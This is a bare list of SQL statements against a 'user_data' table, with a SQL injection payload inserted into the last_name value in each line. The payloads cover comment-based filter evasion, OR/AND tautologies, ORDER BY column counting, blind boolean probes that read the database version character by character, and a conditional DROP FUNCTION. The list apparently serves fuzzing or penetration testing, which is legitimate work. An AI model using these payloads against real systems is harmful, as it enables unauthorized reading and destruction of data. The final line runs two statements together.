SELECT * FROM user_data WHERE last_name = ''/^.*1'--+-.*$/;
SELECT * FROM user_data WHERE last_name = ''/*!500001'--+-*/;
SELECT * FROM user_data WHERE last_name = ''1'--/**/-;
SELECT * FROM user_data WHERE last_name = ''1'--/*--*/-;
SELECT * FROM user_data WHERE last_name = ''1'--/*&a=*/-;
SELECT * FROM user_data WHERE last_name = ''1'--/*1337*/-;
SELECT * FROM user_data WHERE last_name = ''1'--/**_**/-;
SELECT * FROM user_data WHERE last_name = ''1'--%0A-;
SELECT * FROM user_data WHERE last_name = ''1'--%0b-;
SELECT * FROM user_data WHERE last_name = ''1'--%0d%0A-;
SELECT * FROM user_data WHERE last_name = ''1'--%23%0A-;
SELECT * FROM user_data WHERE last_name = ''1'--%23foo%0D%0A-;
SELECT * FROM user_data WHERE last_name = ''1'--%23foo*%2F*bar%0D%0A-;
SELECT * FROM user_data WHERE last_name = ''1'--#qa%0A#%0A-;
SELECT * FROM user_data WHERE last_name = ''/*!20000%0d%0a1'--+-*/;
SELECT * FROM user_data WHERE last_name = ''/*!blobblobblob%0d%0a1'--+-*/;
SELECT * FROM user_data WHERE last_name = '/^.*1'--+-.*$/  ;
SELECT * FROM user_data WHERE last_name = '/*!500001'--+-*/  ;
SELECT * FROM user_data WHERE last_name = '1'--/**/-  ;
SELECT * FROM user_data WHERE last_name = '1'--/*--*/-  ;
SELECT * FROM user_data WHERE last_name = '1'--/*&a=*/-  ;
SELECT * FROM user_data WHERE last_name = '1'--/*1337*/- ;
SELECT * FROM user_data WHERE last_name = '1'--/**_**/-  ;
SELECT * FROM user_data WHERE last_name = '1'--%0A-  ;
SELECT * FROM user_data WHERE last_name = '1'--%0b-  ;
SELECT * FROM user_data WHERE last_name = '1'--%0d%0A-  ;
SELECT * FROM user_data WHERE last_name = '1'--%23%0A-  ;
SELECT * FROM user_data WHERE last_name = '1'--%23foo%0D%0A-  ;
SELECT * FROM user_data WHERE last_name = '1'--%23foo*%2F*bar%0D%0A-  ;
SELECT * FROM user_data WHERE last_name = '1'--#qa%0A#%0A-  ;
SELECT * FROM user_data WHERE last_name = '/*!20000%0d%0a1'--+-*/  ;
SELECT * FROM user_data WHERE last_name = '/*!blobblobblob%0d%0a1'--+-*/  ;
SELECT * FROM user_data WHERE last_name = ' OR 1=1 ;
SELECT * FROM user_data WHERE last_name = ' OR 1=0 ;
SELECT * FROM user_data WHERE last_name = ' OR x=x ;
SELECT * FROM user_data WHERE last_name = ' OR x=y ;
SELECT * FROM user_data WHERE last_name = ' OR 1=1# ;
SELECT * FROM user_data WHERE last_name = ' OR 1=0# ;
SELECT * FROM user_data WHERE last_name = ' OR x=x# ;
SELECT * FROM user_data WHERE last_name = ' OR x=y# ;
SELECT * FROM user_data WHERE last_name = ' OR 1=1--  ;
SELECT * FROM user_data WHERE last_name = ' OR 1=0--  ;
SELECT * FROM user_data WHERE last_name = ' OR x=x--  ;
SELECT * FROM user_data WHERE last_name = ' OR x=y--  ;
SELECT * FROM user_data WHERE last_name = ' OR 3409=3409 AND ('pytW' LIKE 'pytW ;
SELECT * FROM user_data WHERE last_name = ' OR 3409=3409 AND ('pytW' LIKE 'pytY ;
SELECT * FROM user_data WHERE last_name = ' HAVING 1=1 ;
SELECT * FROM user_data WHERE last_name = ' HAVING 1=0 ;
SELECT * FROM user_data WHERE last_name = ' HAVING 1=1# ;
SELECT * FROM user_data WHERE last_name = ' HAVING 1=0# ;
SELECT * FROM user_data WHERE last_name = ' HAVING 1=1--  ;
SELECT * FROM user_data WHERE last_name = ' HAVING 1=0--  ;
SELECT * FROM user_data WHERE last_name = ' AND 1=1 ;
SELECT * FROM user_data WHERE last_name = ' AND 1=0 ;
SELECT * FROM user_data WHERE last_name = ' AND 1=1--  ;
SELECT * FROM user_data WHERE last_name = ' AND 1=0--  ;
SELECT * FROM user_data WHERE last_name = ' AND 1=1# ;
SELECT * FROM user_data WHERE last_name = ' AND 1=0# ;
SELECT * FROM user_data WHERE last_name = ' AND 1=1 AND '%'=' ;
SELECT * FROM user_data WHERE last_name = ' AND 1=0 AND '%'=' ;
SELECT * FROM user_data WHERE last_name = ' AND 1083=1083 AND (1427=1427 ;
SELECT * FROM user_data WHERE last_name = ' AND 7506=9091 AND (5913=5913 ;
SELECT * FROM user_data WHERE last_name = ' AND 1083=1083 AND ('1427=1427 ;
SELECT * FROM user_data WHERE last_name = ' AND 7506=9091 AND ('5913=5913 ;
SELECT * FROM user_data WHERE last_name = ' AND 7300=7300 AND 'pKlZ'='pKlZ ;
SELECT * FROM user_data WHERE last_name = ' AND 7300=7300 AND 'pKlZ'='pKlY ;
SELECT * FROM user_data WHERE last_name = ' AND 7300=7300 AND ('pKlZ'='pKlZ ;
SELECT * FROM user_data WHERE last_name = ' AND 7300=7300 AND ('pKlZ'='pKlY ;
SELECT * FROM user_data WHERE last_name = ' AS INJECTX WHERE 1=1 AND 1=1 ;
SELECT * FROM user_data WHERE last_name = ' AS INJECTX WHERE 1=1 AND 1=0 ;
SELECT * FROM user_data WHERE last_name = ' AS INJECTX WHERE 1=1 AND 1=1# ;
SELECT * FROM user_data WHERE last_name = ' AS INJECTX WHERE 1=1 AND 1=0# ;
SELECT * FROM user_data WHERE last_name = ' AS INJECTX WHERE 1=1 AND 1=1-- ;
SELECT * FROM user_data WHERE last_name = ' AS INJECTX WHERE 1=1 AND 1=0-- ;
SELECT * FROM user_data WHERE last_name = ' WHERE 1=1 AND 1=1 ;
SELECT * FROM user_data WHERE last_name = ' WHERE 1=1 AND 1=0 ;
SELECT * FROM user_data WHERE last_name = ' WHERE 1=1 AND 1=1# ;
SELECT * FROM user_data WHERE last_name = ' WHERE 1=1 AND 1=0# ;
SELECT * FROM user_data WHERE last_name = ' WHERE 1=1 AND 1=1-- ;
SELECT * FROM user_data WHERE last_name = ' WHERE 1=1 AND 1=0-- ;
SELECT * FROM user_data WHERE last_name = ' ORDER BY 1--  ;
SELECT * FROM user_data WHERE last_name = ' ORDER BY 2--  ;
SELECT * FROM user_data WHERE last_name = ' ORDER BY 3--  ;
SELECT * FROM user_data WHERE last_name = ' ORDER BY 4--  ;
SELECT * FROM user_data WHERE last_name = ' ORDER BY 5--  ;
SELECT * FROM user_data WHERE last_name = ' ORDER BY 6--  ;
SELECT * FROM user_data WHERE last_name = ' ORDER BY 7--  ;
SELECT * FROM user_data WHERE last_name = ' ORDER BY 8--  ;
SELECT * FROM user_data WHERE last_name = ' ORDER BY 9--  ;
SELECT * FROM user_data WHERE last_name = ' ORDER BY 10--  ;
SELECT * FROM user_data WHERE last_name = ' ORDER BY 11--  ;
SELECT * FROM user_data WHERE last_name = ' ORDER BY 12--  ;
SELECT * FROM user_data WHERE last_name = ' ORDER BY 13--  ;
SELECT * FROM user_data WHERE last_name = ' ORDER BY 14--  ;
SELECT * FROM user_data WHERE last_name = ' ORDER BY 15--  ;
SELECT * FROM user_data WHERE last_name = ' ORDER BY 16--  ;
SELECT * FROM user_data WHERE last_name = ' ORDER BY 17--  ;
SELECT * FROM user_data WHERE last_name = ' ORDER BY 18--  ;
SELECT * FROM user_data WHERE last_name = ' ORDER BY 19--  ;
SELECT * FROM user_data WHERE last_name = ' ORDER BY 20--  ;
SELECT * FROM user_data WHERE last_name = ' ORDER BY 21--  ;
SELECT * FROM user_data WHERE last_name = ' ORDER BY 22--  ;
SELECT * FROM user_data WHERE last_name = ' ORDER BY 23--  ;
SELECT * FROM user_data WHERE last_name = ' ORDER BY 24--  ;
SELECT * FROM user_data WHERE last_name = ' ORDER BY 25--  ;
SELECT * FROM user_data WHERE last_name = ' ORDER BY 26--  ;
SELECT * FROM user_data WHERE last_name = ' ORDER BY 27--  ;
SELECT * FROM user_data WHERE last_name = ' ORDER BY 28--  ;
SELECT * FROM user_data WHERE last_name = ' ORDER BY 29--  ;
SELECT * FROM user_data WHERE last_name = ' ORDER BY 30--  ;
SELECT * FROM user_data WHERE last_name = ' ORDER BY 31337--  ;
SELECT * FROM user_data WHERE last_name = ' ORDER BY 1#  ;
SELECT * FROM user_data WHERE last_name = ' ORDER BY 2#  ;
SELECT * FROM user_data WHERE last_name = ' ORDER BY 3#  ;
SELECT * FROM user_data WHERE last_name = ' ORDER BY 4#  ;
SELECT * FROM user_data WHERE last_name = ' ORDER BY 5#  ;
SELECT * FROM user_data WHERE last_name = ' ORDER BY 6#  ;
SELECT * FROM user_data WHERE last_name = ' ORDER BY 7#  ;
SELECT * FROM user_data WHERE last_name = ' ORDER BY 8#  ;
SELECT * FROM user_data WHERE last_name = ' ORDER BY 9#  ;
SELECT * FROM user_data WHERE last_name = ' ORDER BY 10#  ;
SELECT * FROM user_data WHERE last_name = ' ORDER BY 11#  ;
SELECT * FROM user_data WHERE last_name = ' ORDER BY 12#  ;
SELECT * FROM user_data WHERE last_name = ' ORDER BY 13#  ;
SELECT * FROM user_data WHERE last_name = ' ORDER BY 14#  ;
SELECT * FROM user_data WHERE last_name = ' ORDER BY 15#  ;
SELECT * FROM user_data WHERE last_name = ' ORDER BY 16#  ;
SELECT * FROM user_data WHERE last_name = ' ORDER BY 17#  ;
SELECT * FROM user_data WHERE last_name = ' ORDER BY 18#  ;
SELECT * FROM user_data WHERE last_name = ' ORDER BY 19#  ;
SELECT * FROM user_data WHERE last_name = ' ORDER BY 20#  ;
SELECT * FROM user_data WHERE last_name = ' ORDER BY 21#  ;
SELECT * FROM user_data WHERE last_name = ' ORDER BY 22#  ;
SELECT * FROM user_data WHERE last_name = ' ORDER BY 23#  ;
SELECT * FROM user_data WHERE last_name = ' ORDER BY 24#  ;
SELECT * FROM user_data WHERE last_name = ' ORDER BY 25#  ;
SELECT * FROM user_data WHERE last_name = ' ORDER BY 26#  ;
SELECT * FROM user_data WHERE last_name = ' ORDER BY 27#  ;
SELECT * FROM user_data WHERE last_name = ' ORDER BY 28#  ;
SELECT * FROM user_data WHERE last_name = ' ORDER BY 29#  ;
SELECT * FROM user_data WHERE last_name = ' ORDER BY 30# ;
SELECT * FROM user_data WHERE last_name = ' ORDER BY 31337# ;
SELECT * FROM user_data WHERE last_name = ' ORDER BY 1  ;
SELECT * FROM user_data WHERE last_name = ' ORDER BY 2  ;
SELECT * FROM user_data WHERE last_name = ' ORDER BY 3  ;
SELECT * FROM user_data WHERE last_name = ' ORDER BY 4  ;
SELECT * FROM user_data WHERE last_name = ' ORDER BY 5  ;
SELECT * FROM user_data WHERE last_name = ' ORDER BY 6  ;
SELECT * FROM user_data WHERE last_name = ' ORDER BY 7  ;
SELECT * FROM user_data WHERE last_name = ' ORDER BY 8  ;
SELECT * FROM user_data WHERE last_name = ' ORDER BY 9  ;
SELECT * FROM user_data WHERE last_name = ' ORDER BY 10  ;
SELECT * FROM user_data WHERE last_name = ' ORDER BY 11  ;
SELECT * FROM user_data WHERE last_name = ' ORDER BY 12  ;
SELECT * FROM user_data WHERE last_name = ' ORDER BY 13  ;
SELECT * FROM user_data WHERE last_name = ' ORDER BY 14  ;
SELECT * FROM user_data WHERE last_name = ' ORDER BY 15  ;
SELECT * FROM user_data WHERE last_name = ' ORDER BY 16  ;
SELECT * FROM user_data WHERE last_name = ' ORDER BY 17  ;
SELECT * FROM user_data WHERE last_name = ' ORDER BY 18  ;
SELECT * FROM user_data WHERE last_name = ' ORDER BY 19  ;
SELECT * FROM user_data WHERE last_name = ' ORDER BY 20  ;
SELECT * FROM user_data WHERE last_name = ' ORDER BY 21  ;
SELECT * FROM user_data WHERE last_name = ' ORDER BY 22  ;
SELECT * FROM user_data WHERE last_name = ' ORDER BY 23  ;
SELECT * FROM user_data WHERE last_name = ' ORDER BY 24  ;
SELECT * FROM user_data WHERE last_name = ' ORDER BY 25  ;
SELECT * FROM user_data WHERE last_name = ' ORDER BY 26  ;
SELECT * FROM user_data WHERE last_name = ' ORDER BY 27  ;
SELECT * FROM user_data WHERE last_name = ' ORDER BY 28  ;
SELECT * FROM user_data WHERE last_name = ' ORDER BY 29  ;
SELECT * FROM user_data WHERE last_name = ' ORDER BY 30  ;
SELECT * FROM user_data WHERE last_name = ' ORDER BY 31337  ;
SELECT * FROM user_data WHERE last_name = ' RLIKE (SELECT (CASE WHEN (4346=4346) THEN 0x61646d696e ELSE 0x28 END)) AND 'Txws'=' ;
SELECT * FROM user_data WHERE last_name = ' RLIKE (SELECT (CASE WHEN (4346=4347) THEN 0x61646d696e ELSE 0x28 END)) AND 'Txws'=' ;
SELECT * FROM user_data WHERE last_name = ' IF(7423=7424) SELECT 7423 ELSE DROP FUNCTION xcjl-- ;
SELECT * FROM user_data WHERE last_name = ' IF(7423=7423) SELECT 7423 ELSE DROP FUNCTION xcjl-- ;
SELECT * FROM user_data WHERE last_name = ' %' AND 8310=8310 AND '%'=' ;
SELECT * FROM user_data WHERE last_name = ' %' AND 8310=8311 AND '%'=' ;
SELECT * FROM user_data WHERE last_name = ' and (select substring(@@version,1,1))='X' ;
SELECT * FROM user_data WHERE last_name = ' and (select substring(@@version,1,1))='M' ;
SELECT * FROM user_data WHERE last_name = ' and (select substring(@@version,2,1))='i' ;
SELECT * FROM user_data WHERE last_name = ' and (select substring(@@version,2,1))='y' ;
SELECT * FROM user_data WHERE last_name = ' and (select substring(@@version,3,1))='c' ;
SELECT * FROM user_data WHERE last_name = ' and (select substring(@@version,3,1))='S' ;
SELECT * FROM user_data WHERE last_name = ' and (select substring(@@version,3,1))='X' ;SELECT * FROM user_data WHERE last_name = '